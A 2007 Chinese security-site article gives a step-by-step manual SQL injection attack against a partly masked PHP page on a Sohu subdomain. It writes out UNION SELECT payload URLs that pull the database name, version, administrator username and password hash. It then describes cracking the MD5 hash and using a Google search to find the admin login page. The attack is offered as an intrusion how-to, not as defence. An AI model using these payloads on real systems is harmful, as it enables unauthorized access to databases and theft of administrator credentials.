| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
安全365
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 系统安全首页 | 漏洞分析 | 入侵检测 | 升级补丁 | 安全配置 |
php这样也能入侵
php这样也能入侵
作者:不祥 文章来源:华盟收集 点击数: 更新时间:2007-7-16 9:23:23
 

前段时间 iceskysl  说php很容易学,撑着星期天放假,我就尝试着活动活动,没想到和asp手工注入大同小异.

在猜解的时候.我们可以用工具也可以用手工.原理是一样的.为了方便我们可以使用工具.

1.找到一个php注入点:http://xxxxx.sohu.com/xxxx.php?brand_id=1

and 1=1 回显正常,and 1=2 回显与第一页不一样.说明有注入点。

2.进行猜解:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

注:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 这就是传说中的 Ascii逐字解码法

我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:

也就是说如果ID=1(admin管理)的username长度大于0,则条件成立。

接着就是,1、,2、,3这样测试下去,一直到条件成立为止,比如,7成立,,8不成立

就可以得库名、列名。我们在再and (sele....前加上admin 1=2

既:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

这里我们猜到了数字3是数据库名,够造Url.见下.

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

同样查询version()可以得到程序的版本.database(),version()是系统变量。

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin


以上Url查出管理员所在的表数字.按回显数字是3.我们就把3改成name或usename。

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,name,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin

回显出一个admin,还有一个数字7.我们就把7改成passwd或pass

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,name,6,passwd,8,9,10,11,12,13,14,15,16,17%20from%20admin

出来了.管理员密码mD5加密.我们可以登陆MD5解密网站进行破解.

破解密码后.我们就可以找目标后台了.通常是/admin,./admin/login.php。

如果找不到的话,我们可以使用google hack.够造查询关键词:管理&登陆&admin&login site:xxxxx.sohu.com

文章录入:杰瑞    责任编辑:洋葱头 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    安全小技巧之个人电脑防
    入侵搜索关键字
    菜鸟的网吧常见漏洞入侵
    入侵手机网
    拒绝入侵让注册表对病毒
    入侵XP常用七大黑招
    入侵虚拟主机的简单方案
    练就基本功 封死病毒、黑
    十四大绝招 教你预防病毒
    七计轻松拆穿木马伪装 拒
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有